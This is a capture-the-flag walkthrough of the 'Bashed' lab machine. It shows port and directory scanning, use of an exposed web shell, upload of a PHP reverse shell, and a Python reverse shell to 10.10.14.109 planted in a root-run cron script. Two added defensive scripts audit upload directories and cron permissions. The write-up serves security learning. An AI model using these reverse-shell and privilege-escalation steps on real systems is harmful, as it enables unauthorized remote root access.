Bashed

Nmap result:

80/tcp    open     http      Apache httpd 2.4.18 ((Ubuntu))
|_http-title: Arrexel's Development Site
|_http-server-header: Apache/2.4.18 (Ubuntu)
5488/tcp  filtered unknown
10459/tcp filtered unknown
11833/tcp filtered unknown
15168/tcp filtered unknown
27876/tcp filtered astrolink
37122/tcp filtered unknown
45155/tcp filtered unknown
53415/tcp filtered unknown

This made me believe that port 80 is the only attack vector, maybe somewhere to upload a malicious file?

Ran gobuster

gobuster dir -u http://10.129.165.204:80/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

/images

/php

/uploads/

/dev/

Clicking one of them took me to a web-based shell.

PHP version -> PHP 7.0.22-0ubuntu0.16.04.1 (cli) ( NTS )

Upload a reverse shell (pentest monkey script) and browse to uploads/php-reverse-shell.php to trigger it.
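The upload step works because the web server will execute whatever lands in uploads/. From the defender's side, the useful check is a scan of the upload directory for anything the PHP handler could execute, by extension (including double extensions such as name.php.jpg) and by content (a PHP open tag in a file claiming to be an image). This is an added example, not part of the original writeup; the sample files it creates in a temporary directory are constructed, and the extension list assumes a typical mod_php handler configuration.

```python
import re
import tempfile
from pathlib import Path

# Extensions a typical mod_php setup hands to the PHP engine (assumption: default-ish Apache config).
PHP_EXTS = {".php", ".phtml", ".php3", ".php4", ".php5", ".phar", ".phps"}
# Matches "<?php" and the short echo tag "<?=" in the file content.
PHP_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


def scan_upload_dir(root):
    """Return sorted (filename, [reasons]) for files in root that look executable by PHP.

    A file is flagged if any of its suffixes is a PHP extension (catches shell.php.jpg)
    or if the first 4 KiB of its content contains a PHP open tag.
    """
    findings = []
    for f in Path(root).rglob("*"):
        if not f.is_file():
            continue
        reasons = []
        suffixes = {s.lower() for s in f.suffixes}
        if suffixes & PHP_EXTS:
            reasons.append("php extension")
        head = f.read_bytes()[:4096]
        if PHP_TAG.search(head):
            reasons.append("php open tag in content")
        if reasons:
            findings.append((f.name, reasons))
    return sorted(findings)


def demo():
    """Build a constructed uploads directory and scan it (sample data, not from the box)."""
    with tempfile.TemporaryDirectory() as d:
        root = Path(d)
        # Legitimate image: JPEG magic bytes, .jpg extension.
        (root / "photo.jpg").write_bytes(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")
        # Double extension: JPEG content, but ".php" is one of its suffixes.
        (root / "avatar.php.jpg").write_bytes(b"\xff\xd8\xff\xe0\x00\x10JFIF\x00")
        # Plain PHP file: both extension and content give it away.
        (root / "shell.php").write_bytes(b"<?php echo 'constructed sample'; ?>")
        return scan_upload_dir(root)


if __name__ == "__main__":
    for name, reasons in demo():
        print(f"{name}: {', '.join(reasons)}")
```

Flagging is only half of it; the mitigation is to make sure the handler never runs in that directory in the first place (for mod_php, a `php_admin_flag engine off` in the `<Directory>` block for uploads/ does this) and to rename uploads to a server-chosen name with a whitelisted extension.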

Try to run LinEnum on it (uploaded via a Python HTTP server and wget; curl is not installed).

The shell was not accessible (no tty present), so I just used the python command to call it.

Once you get the shell, you can switch to the scriptmanager user's bash:

sudo -u scriptmanager bash

There's a text.py script that runs every minute (run "date" and "ls -la" to confirm it).

Replace it with the following script:

import socket,subprocess,os
# connect back to the listener on the attacking machine
s=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
s.connect(("10.10.14.109",5555))
# point stdin, stdout and stderr at the socket
os.dup2(s.fileno(),0)
os.dup2(s.fileno(),1)
os.dup2(s.fileno(),2)
# spawn an interactive bash that now talks over the socket
p=subprocess.call(["/bin/bash","-i"])

Why does it come back as root?

  • Because the script is run by root (the scheduled job executes it as root), so whatever replaces it runs with root privileges.
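The privilege escalation here is a classic scheduled-task weakness: a script executed as root that a lower-privileged account can modify. The defender's check is to audit every script a cron job runs as root and flag any that is owned by someone else, writable by group or world, or sitting in a directory where it can simply be replaced. This is an added example, not part of the original writeup; the sample files in demo() are constructed in a temporary directory, and the paths in the __main__ block are placeholders for your own cron entries.

```python
import os
import stat
import tempfile
from pathlib import Path


def find_weak_cron_scripts(paths, runner_uid=0):
    """Return (path, reason) pairs for scripts that someone other than the executing
    account (root by default) could alter before the scheduler runs them."""
    findings = []
    for p in map(Path, paths):
        if not p.exists():
            findings.append((str(p), "missing (dangling cron entry)"))
            continue
        st = p.stat()
        # Owner mismatch: the owner can rewrite the file even if the mode looks tight.
        if st.st_uid != runner_uid:
            findings.append((str(p), f"owned by uid {st.st_uid}, executed as uid {runner_uid}"))
        if st.st_mode & stat.S_IWOTH:
            findings.append((str(p), "world-writable"))
        elif st.st_mode & stat.S_IWGRP and st.st_gid != 0:
            findings.append((str(p), f"group-writable (gid {st.st_gid})"))
        # A world-writable parent without the sticky bit lets anyone replace the file wholesale.
        parent = p.parent.stat()
        if parent.st_mode & stat.S_IWOTH and not parent.st_mode & stat.S_ISVTX:
            findings.append((str(p), "parent directory world-writable without sticky bit"))
    return findings


def demo():
    """Constructed sample: one tight script and one world-writable one, audited against
    the current user as the 'runner' so the example works without root."""
    with tempfile.TemporaryDirectory() as d:
        ok = Path(d) / "ok.py"
        weak = Path(d) / "weak.py"
        ok.write_text("print('sample')\n")
        weak.write_text("print('sample')\n")
        os.chmod(ok, 0o644)
        os.chmod(weak, 0o666)
        findings = find_weak_cron_scripts([ok, weak], runner_uid=os.getuid())
        return {Path(p).name: reason for p, reason in findings}


if __name__ == "__main__":
    # Placeholder paths: substitute the scripts referenced by root's crontab / /etc/cron.d.
    for path, reason in find_weak_cron_scripts(["/placeholder/scripts/job.py"]):
        print(f"{path}: {reason}")
```

The ownership check is the one that matters for this box: a mode of 644 looks harmless, but if the file belongs to a non-root user, that user controls what root executes every minute. Fixing it is a chown to root plus 755, and ideally moving the script out of any directory the lower-privileged account can write to.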
